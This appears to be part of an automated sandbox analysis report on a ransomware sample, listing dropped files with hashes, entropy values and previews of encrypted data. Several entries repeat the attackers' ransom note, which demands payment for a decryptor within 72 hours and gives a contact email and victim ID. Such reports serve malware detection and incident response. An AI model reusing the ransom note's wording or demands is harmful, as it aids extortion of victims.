                                                                                            Entropy (8bit):7.86088324400785
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:RpdEn+fpWLL429sEyISJ1MyRxx39xaek3vIC9QXQ3hyW:RpdEZYo1yDZvaek/peQ3f
                                                                                            MD5:1B6B03040E5AF2C4AAE40E76EBE5D8A0
                                                                                            SHA1:15F96AF9E90095F8385C4B8AB55BA180A4BD27AA
                                                                                            SHA-256:E1D96906A77BFD401F48A415D6D6E98CDB5D500D0D18D89E49DB1D10B12EE7A6
                                                                                            SHA-512:908DCEA57166456C5AAB669134CCC6696D5FD5D077EDD5FA036FA61474FDA53C3A888C9422E0D13F2A71F6D00ADD40B8A2C5DDE7C3D5A4CBB4EB6F38D1FBCF1E
                                                                                            Malicious:false
                                                                                            Preview:Oq2.(..........[..QT(V?.,g;... 2.yLZ.H'.%...2UbH...h.......".<....9.>..|~...y_.~CO....:. C.H.P..D......5..T...}2.7../W.Z.\.3+.9..!..nFt.....H'-.u.8....%.}......)x..`.E.q+..\...;......P..z8XU...|...H......+.Q...M....{<...4...O."<\..+.....%...Iz..kP.t.B?.P...2.>..............%.8m.a.w..d.%..........6..h.3 .&%..R....3............w$P .......&o&&..8...5.......).`~.........*.S..=.vY.B..4u?..i.f..^.........=j...o.w......a....}..<./.M.k.........eJB......M!..f..g`..I..F.%. v......._...Ybv.zr..l!....q.*\..+..M.Xv..0.../..:.....,.S.t...?.l.....U#.RM. ..}.[.Q.....L.......F.....%.\H..Y....nw....Du.lQg...|u#3..(.,..2x..j.x/w<t.)....N..h..F.->j.B.y.n...P.+....'`Yu...s......7tz..V.......V....1...}.&E&..7..'.}..2'I......).........)..z..F..`.r..Z.\...H..?39.c..p=5...B...D.$...9c"ds.'.U...t-..].J....8]B....g....u.9n.O..CK....&6....K%..'1.L.....v....(....+.......EV"...@...B..k.l....UYh......!A....B}....1.]..#.T^.z.@........y.).).y.....ZO.N_..[..f.Mk..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.85534866394164
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:1gEB5ljRjdo0wKGIsqxfumGQkqEKs6N/FT0TzbfeMXC/XqxEia:JiGfkqEKs6NSLfzX1x8
                                                                                            MD5:589C68BBE075DA1310E12AF84A4826FC
                                                                                            SHA1:B38E047B8F0E48E972C583807A3733176270E33F
                                                                                            SHA-256:6BBAD0ECCE09EDC5A5E0A40C7833336C53D81D03C0CBC1144B1B5C36EE965F66
                                                                                            SHA-512:6FB27711CCB028CC4F255652D0769FB041DAC519784D92C8FAEDDC9F8792490587104A277747AF9CB08D774557D34F26BD8EBDE49FEC1AB1C019A801BC919236
                                                                                            Malicious:false
                                                                                            Preview:..r.......&..P`..D.......H.d.{..$.......g.0.r.....=..`.<..Yn$.9..<:.V..j.6..E.Z?..6:1h(Q2..J5..9.T..{...:.B... .w..<f..7.b..IkqL.....7..b.F..."z.y.....\.._..l!...o....V..M0..\.4.a......s..`.E....Jf...w..n.....Q..%...y.Z.........c..X...#.W..j..=B.i.$.....i6...h.f..H.A......t9........Z-o..U.IU.@.l...7~123...e.~....x`?F{....d....w...b...|.M......F\>qL.......#1......4e...r..2......$.".WW..!........k:V.x...,./:=.=..>.K[..:v.;^.Rt....e./...#.b<..e.....|#..51a.-..8../....5.C...6K.B..z......4........\.....E...&.....5%.$..zl.Xh/......].R.dQu.tGJ....=.~..pT.C.EP...u..^GI.1.Z.tD...T.'8...ba.<.V.g..A..a....5..g.%g$..Ce&.#..@+..Z.jso.Z...!4O.&...k._.-tL..?,'.6.p.....%....r...#.....J.G...'j.?...$........j."!....u...<_;..8...|c...]ah.u.d..7..":...X.P2.w....)_..5g..~..Y..`|...A.\..}V.....C....?.k.%.L..>...D..-WS......q".H..!?.:D~...dsDe..F.N.2r.%... `..s..u6aw...r,.=s..H..jb...-.!.E.*H.%2...J...|&....zV.qK.^.Wq...,d..u.....$1V.?e&.#.3tD%.U....Y..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.856125690102746
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:wIfNGwQL16FJ4X9GNyesRmHuBC04xfvnOmIb8ihjnwB+WPkyOspw/SE07zqgLH:wPwy6K4N3Em1x3OXrspwKX
                                                                                            MD5:A5E760769802B0ECD204FACD8A700E31
                                                                                            SHA1:97CB85D2E4EB15CFD38111625A79C56BDC5CF272
                                                                                            SHA-256:8FD0CC16521882AAB8EDC5317F6675A468DF725CCD2C325E8A5C2AC8E0AB9BA5
                                                                                            SHA-512:4B168A07EAF977A1A867259FA82CB1E25344F8C5C1EFEF4AD30A7CCC5CE7FAD0A1F286FFB20AB43FC704C3F72C17946FCE924AD236429851465AD8592A0B9EEE
                                                                                            Malicious:false
                                                                                            Preview:2.......[9..5^J.HK...9.#...5.l..[Oi.-..[.....>..Rl.G.A.N..b.Xl...r..Q.W....6.8..u.$*..(.....x.uf96^Z.../.k.[....O....;|.....Fw....U}.....R..D9"..U0.{.F......s.e...q9nf}S.4w~..'..:..Q*.IK...>j....8D.Y.d...H.[#.>....{.K...7=F..... ..E82g>M.)e5....J...#..`.C.d..S.....Th..W.U.L*...>.f....j7.F.].........n....H..{.g.....{...n#.>._.PR.l.[.<.......IrM..^%.;fh...H.&Q...p..w.........8T......a.4......?TN...Sx..U...~.........'=@....DN]._s..B..6...9.3..S.lGp.z..k.'....(..,L...RE..D4a....s..K.....Q....z[r&n.-.b.8...CBL.+..~...Sj..{k.D.H.......i.5.(J.9.%..'...y. ..{...!....E..2P._d.....y...J.........%...t+..^.co...f&...',..,d*ba.[.`...].J}.$..MInU.v|{. 'X>...N....m.z...Jf$............)..kI.3d..S:8."..\O..#^,...(.N.%..j.....E.K...m......nbz&.$..Y(..v....od...y...N..s.cD..}..k.*....s.4T.g.S..=.}l....i@..$=.6......!...L..].s..*....Y..{........Xq.#.......fBL.j0...~..r.....j.Np[.v7...{.P*..`C..D.+4....E.jt..\G.j@.6./...3..H....u....r.a....=".m;...+b.P
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1315
                                                                                            Entropy (8bit):7.828121890752034
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:WrtX1K2V/VQOzXt5jgmyUUqW5yDsy23E7K/xFX36rX7Z4PtcDjabRL:We3OzPvyUlwNr36rX7Z4Ptcn6
                                                                                            MD5:57F376B2D1C5C9F9229B5BE3D0CA6E04
                                                                                            SHA1:BFC0EB561898AAC96235AD44549A301521840AF9
                                                                                            SHA-256:5263CCCE1747374316C3452AD5D68B66E773DC52B55948A97A157D9FA1C94A87
                                                                                            SHA-512:8BA1B07F8D1DEC582AC2F2CD714198C2B67F8993B4A697E9A0B156FAC9DBA844B264DA7792DD3A35D44BF212B8AAA9758896C95B7966CF77EFC3A4A81B0225DC
                                                                                            Malicious:false
                                                                                            Preview:.......4..n....Q.=..VI...d59 7w...1...g/.T..<....J...&....).l..0|?..sd..J.......ji....6|Jr.z.....7...gv..K...+.GO..P..I.;.?.Jp.N..9Lg.... S..Mv.2.~..{..q{:..Z.z..."...u....*.3._]..$Z.X2m......dV".7 ..m'....=..p..m2..._.../(p......q......6.N...x...N}It..Y.fT.s&.D.[....<~..>.>.........C1.0..%%(..=.)..`..........<...O.Cn...R.rP......].....F..o..}~.u..h+T...3..@..a.....>.s.r....iCPY.`.4@q....>B.Q.Gp>%....F.n2....M)w.._......g.....8.O...J....{&.....j....wC\...Q.?...B..^.....4....K.].T....... .oz-..B.!N.:.Y.m..B.o...').n.5.c..._......J..PU.*o.t..?............1./..[h2...9..c......p70xw..u*.=...x. ..<2.d...%.?...Q.@K....G....f,e..jJZAA>9Z.$.vaI.8)@.<.O.rp2B....}....J.822E.+..k...`v....#.).k.. {.....X8u".'3.......7.....1.g.a..&S.N...dt...L.p...?.b.....;....t.6..VQG,X.................H%o../..U'.2...H....Z..e..L7b).L.a.@I9e..J.v......U...Q..H........%.Z....L.b..R..q'0. q./z|...V.a9....f}R..i.............2..dT5....~..8....s..I....j.......&Z..9FAt
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.197989314719102
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:TuuJWuIUFcoNMTg4gmXKAAXJairCU7KbVfDsNbzMYFHy4akHn:TuuJHcfgXmcrUbeUYNy4fn
                                                                                            MD5:D1C98DBBDE48AD00E31E9999ADF3D596
                                                                                            SHA1:F6DA3987961A314C7E763749F357FF4B9CB585F7
                                                                                            SHA-256:374F077921B293B667DE11B4CC77E175B3C66EF5D947B1B1C4BC1464D34BA53B
                                                                                            SHA-512:55656574E911E52A65A6917AC0D75EDE23260A247893FAA89A6C30D0414690A7EE15F4AD1E95AA7A55FC8A115FA96493C89A954339056598EBCED9AF28BD4160
                                                                                            Malicious:false
                                                                                            Preview:.AZ...Jz.R...y............4..;.....L..`(..<.5H}/....F.i.Y6.9I....5..0....=...Ku}w3v...Bi/..z..(....{@....\U.T4/c...D/...m*0..K....i.....uBt.!.3.k....h.....F.A..z.....r/.+.c.fZ1.a8..J~5:..]N..Q.[..J$.......WW..l&..Y.,.)..~>...S...g.N[..="..... 6. ...j.7.fI.Z...n.^0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.109601056449736
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:uym///WqUY4S3vj4IkRwJojEGjKTEBIKyaUC7EXKEZuyaf0u2iIn:wXMS8IkOojcTEN21X/q2iIn
                                                                                            MD5:745D471CD75AE9EF822A7DA41A5B9AFB
                                                                                            SHA1:8BA690ADA51B26D66F821716331EEE0C278C1A2F
                                                                                            SHA-256:EF5EF34F24215B60CEB8630EA9ABC9D5A37CC10B30057732AE6D56930B5ED816
                                                                                            SHA-512:5B0CC105E385ED39B6684FA588E348402A3AB9B695F9E1BECE2868113C9C4D7AFA1EDA64F081BF1CCA5DC57E93A80559C105BE80B5C42FA136B9590D2666231A
                                                                                            Malicious:false
                                                                                            Preview:z.....q....l.'............[i'.B..O...?.f.........7.5+b..)..t.b. .(......6$......f......T...n7...Fu.....=.........!C.s.i....... ..*...dW..f....d.`.(.T$..8S.s.g)....N.)."8.i..T.1,..!0..le;0<.|....Z3.B..:&0i...f.5Q..l..<'w~]s....9U...Tdq$l....fE..A.o..G.2...z...:S.(C0z0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.144101172618045
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:rjB/ltl0sEmwlRFJmIlzlUGbv8vXrGJq2BTDUZRWPpzBT8M/da0i86uFzi4aJ30b:3Bv/ETlPYELvsqk2ta6zA0i86uF+un
                                                                                            MD5:0C1D682574FD8BF990C5A0B455501A92
                                                                                            SHA1:483A5E54C8426E25F2C011499AD86FB35E090847
                                                                                            SHA-256:7B98E57635209CE723D75A0FB08BE5F64E231ED4762540AB943E05525BF7DA32
                                                                                            SHA-512:EFF97CC2D016C21FFF886ADBBA7B157A78D7C02E8AEE0C60E8A5A37502E57F2A61786F991ADE1D7D422DD1F71B7B84A5ECFF759E0D53350BE09D65A21ACA7F58
                                                                                            Malicious:false
                                                                                            Preview:....t.:..|....q"..........5Q.. .|.Hg..SH|..hQ.1..#...#/B.UZ....40...&..4._.*.....t......s..O...._....*........`..h[c&...m......n.X..^......3....vD..j....)^.a.+Y...G.E ..}.b..I.vi.........)0..?.F.i.....'.......9.Q.G.K-..7..Q....c]A.0.......3f......v.0...Kq.7.>.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):292
                                                                                            Entropy (8bit):7.206581913680902
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:czTFl/6BAiQowCWFRAS9UdhM+sdQNTnwvWEY/kt8gmHn:Ght6QCc2zMbdUwE/E8JHn
                                                                                            MD5:6A7C23E078A6D3DFF82ED89FCA5D2C6C
                                                                                            SHA1:6474EDD0157165303A8375A1C58C3C797737C0F8
                                                                                            SHA-256:E99DE8A138E918C93C3F8E2F944C78FFD9248E8C587E6C52096F80319C3B99E9
                                                                                            SHA-512:E0327F60D663D9A3A83FF9D77375F4DA6CBB25F0408F6D37C4176EFC4F33DBB8C3B02A16F8B1E2AD6B768BF092F88E23FF016ABCC4D3249F4FA017B00C691E0F
                                                                                            Malicious:false
                                                                                            Preview:.Vw......!B.............o./$EI.G.......U}]k..y..`...@B...<.....K.J>XM..D.R@...uT..(..s`..G.Va..at.~..bO.Xb......_N...........w....:.V.,r..f.>....p..d..j...Tf..|?.......j.C.r6....znI.).s....l.2.'L..<;..L.Y O.H...N. 6.2..I,.n...9c...f...H.G>f>.....npG....%yYP.....4f.0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):436
                                                                                            Entropy (8bit):7.458762703571288
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:TXTza0GgGyxe0J801T98m6uZWkXjbp8QQBp400Y2w/sU+KfGXTCLJ+9n:TXhem8aEWWkPp8LBp400YVB9CTC89n
                                                                                            MD5:C42BFD9364087249C3C12B832C8A0814
                                                                                            SHA1:01E6215F0F7AD298D5FA6E66D56D765973303BA8
                                                                                            SHA-256:EDFA35E1FAF77999E7C784DFC45E7E8204B664BD10136687B6AD1247F184DD44
                                                                                            SHA-512:D042A039B327F3F79214E1BE5F4501DEAAF800A77967F11CBB10B53EA9409E9B59955AF5BA92451AFFB32462CE7699B35341387C6C7218470ACE5734290D91E3
                                                                                            Malicious:false
                                                                                            Preview:.I.i..x6"NO.\e.c.M..P..|...?...W=.>g....z./.Za+K..Li....=.U.2....I....m.....,S.G...M..VN....P<,w...........e0o-.sY..'..A.j$.b...]..p.G?...j.V.;.;Q..~8.1.1......m.......[.wu.....7....q.....~fN..O.>..f...Z.B.T.../T.-.^.y.lY.[E.......w...5h.#.a.>....yF..QQ..#...O.b.z;.6.*.E.u.D..x.~....,.7....x..\...ow....].x.6..;....u.....z..,......s.._r.%\J.......q.,.........a...R....^........s..au...H.....1.l.......0xABADCABA
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
                                                                                            Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutamail.com..Attach this file in the email...ID :AE9EA2827220DDDA90F5DD54F3652854147B85A77804672A299D6730060E3643393B1285AB06F81C73412C6EC4B1572473E1014AD45D4C9B49BEF971E21F00343EC99CDC4D2D7DB981B27C1E2EA0FC32AD79322DF1B01F76B1CEC3BCC871DDAD4D378FD1DAA37C4EFA47FA92
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4136
                                                                                            Entropy (8bit):4.77692011219726
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:cvNlHaKqH0dUdsQeOr+dokJJ6PlcQ3JLFkjPn:Qn6FH6UdVr+dHJE9cWkjf
                                                                                            MD5:064D9A238CDEC3C42D0211CA27FF651F
                                                                                            SHA1:B167F9BF6AF4FB29AA28CA8CB22F6A402FAFFB4D
                                                                                            SHA-256:812AF391A003971F0EC09BF8FBE862C8102D89C556E99DAB28A6ECBD4C5EAAAD
                                                                                            SHA-512:6D2F8DAF975799CD61B0084E172B958B7ED38A674A5390623428C3150A0EB6B5D121BAB8831537878810E802320FB6CC3CD549B78CF1A42F28C30BC6C08483FC
                                                                                            Malicious:false
